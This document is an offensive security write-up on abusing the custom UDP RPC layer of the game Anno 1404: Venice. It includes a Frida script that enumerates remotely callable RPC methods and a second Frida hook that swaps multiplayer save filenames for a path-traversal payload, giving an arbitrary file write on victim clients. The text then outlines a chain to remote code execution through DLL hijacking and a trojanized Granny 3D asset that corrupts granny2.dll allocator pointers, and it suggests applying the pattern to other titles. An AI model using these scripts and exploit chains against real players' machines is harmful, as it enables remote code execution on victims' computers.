# Exploring Custom UDP RPCs & File Transfer Abuse


## Mapping proprietary RPC objects with Frida

Older multiplayer titles often build their own RPC stacks on top of UDP. In Anno 1404: Venice this lives inside NetComEngine3.dll via the RMC_CallMessage dispatcher, which parses 5 fields out of every datagram:

| Field | Purpose |
|---|---|
| ID | RPC verb (16-bit) |
| Flags | Transport modifiers (reliability, ordering) |
| SourceObject | ID of the caller |
| TargetObject | Remote object instance |
| Method | Method index inside the target class |

Two helper functions – `ClassToMethodName()` and `TargetName()` – translate the raw IDs into human-readable strings for logging. By brute-forcing the 24-bit object IDs and 16-bit method IDs and calling those helpers, we can enumerate the entire remotely reachable surface without traffic captures or symbol leaks.

<details>
<summary>Frida surface enumerator (trimmed)</summary>

```javascript
'use strict';

// Reflection helpers exported by the engine; they turn raw IDs into display strings.
const classToMethod = Module.getExportByName('NetComEngine3.dll', 'ClassToMethodName');
const targetName = Module.getExportByName('NetComEngine3.dll', 'TargetName');

// Build the NativeFunction wrappers once instead of on every probe.
const method = new NativeFunction(classToMethod, 'pointer', ['pointer', 'uint']);
const target = new NativeFunction(targetName, 'pointer', ['pointer']);

function tryID(objID, methodID) {
  // Both helpers take a pointer to the 32-bit object ID, not the ID itself.
  const buf = Memory.alloc(Process.pointerSize);
  buf.writeU32(objID);
  const m = method(buf, methodID);
  if (!m.isNull()) {
    const t = target(buf);
    console.log(objID.toString(16), '=', t.readUtf16String());
    console.log(' -', methodID, '=', m.readUtf16String());
  }
}

// Walk the object ID space in the stride the engine uses, then the method indices.
for (let obj = 0; obj < 0x9000000; obj += 0x400000) {
  for (let meth = 0; meth < 0x40; meth++) {
    tryID(obj, meth);
  }
}
```

</details>

Running `frida -l explore-surface.js Addon.exe` produced the complete RPC map, including the `Player` object (`0x7400000`) and its file-transfer verbs `OnSendFileInit`, `OnSendFileData`, `OnReceivedFileData`, and `OnCancelSendFile`. The same process applies to any binary protocol that exposes internal reflection helpers: intercept the dispatcher, brute-force the IDs, and log what the engine knows about every callable method.

### Tips

- Use the engine's own logging buffers (`WString::Format` in this case) to avoid re-implementing undocumented string encodings.
- Dump `Flags` to identify reliability features (ACKs, resend requests) before attempting any fuzzing; custom UDP stacks often drop malformed packets silently.
- Keep the enumerated map – it doubles as a fuzzing corpus and makes it obvious which objects manage the filesystem, world state, or in-game scripting.

## Hijacking the file-transfer RPCs

Multiplayer save synchronization used a two-packet handshake:

1. `OnSendFileInit` – carries the UTF-16 filename the client should use when storing the incoming payload.
2. `OnSendFileData` – streams the raw file contents in fixed-size chunks.

Because the server serializes the filename through `ByteStreamWriteString()` immediately before sending, a Frida hook can swap the pointer to a traversal payload while keeping the packet sizes consistent.

<details>
<summary>Filename swapper</summary>

```javascript
// Hard-coded address of ByteStreamWriteString (value from the original write-up).
const writeStr = ptr('0x1003A250');
// Wrapper kept for manual calls; the hook below does not need it.
const ByteStreamWriteString = new NativeFunction(writeStr, 'pointer', ['pointer', 'pointer']);
// Replacement filename: the parent references walk out of the share tree.
const evil = Memory.allocUtf16String('..\\..\\..\\..\\Sauvegarde.sww');

Interceptor.attach(writeStr, {
  onEnter(args) {
    // args[1] points at the string pointer; read the original to match only the save filename.
    const src = args[1].readPointer();
    const value = src.readUtf16String();
    if (value && value.indexOf('Sauvegarde.sww') !== -1) {
      args[1].writePointer(evil);
    }
  }
});
```

</details>

Victim clients performed no checks at all and wrote the received save to whatever path the hostile host supplied, for example dropping it into C:\User\user instead of the intended ...\Savegames\MPShare tree. On Windows installs of Anno 1404 the game directory is world-writable, so the traversal immediately becomes an arbitrary file write primitive:

- Drop DLLs for classic search-order hijacking on next launch, or
- Overwrite asset archives (RDA files) so that weaponized models, textures, or scripts are loaded live during the same session.

### Defending / attacking other targets

- Look for RPC verbs named SendFile, Upload, ShareSave, etc., then intercept the serialization helper responsible for filenames or target directories.
- Even when filenames are length-checked, many stacks forget to canonicalize `..\` or mixed `/` vs `\` separators; brute-force every separator.
- When the receiver stores files under the game install path, check the ACLs with icacls to confirm whether an unprivileged user can drop code there.

## Turning path traversal into live asset execution

Once you can upload arbitrary bytes, replace any asset that is reloaded frequently:

1. Unpack the archive. RDA archives are DEFLATE-based containers whose metadata is XOR-obfuscated with a stream seeded by srand(0xA2C2A). Tools such as RDAExplorer repack the archives after modification.
2. Inject a malicious .gr2. A trojanized Granny 3D file contains a relocation exploit that corrupts SectionContentArray and, through a two-stage relocation chain, gains an arbitrary 4-byte write inside granny2.dll.
3. Hijack allocator callbacks. With ASLR disabled and DEP off, replacing the malloc/free function pointers inside granny2.dll redirects the next allocation to your shellcode, yielding immediate RCE without waiting for the victim to restart the game.

This pattern applies to any title that streams structured assets from binary archives: combine RPC-level traversal for delivery with unsafe relocation processing for code execution.
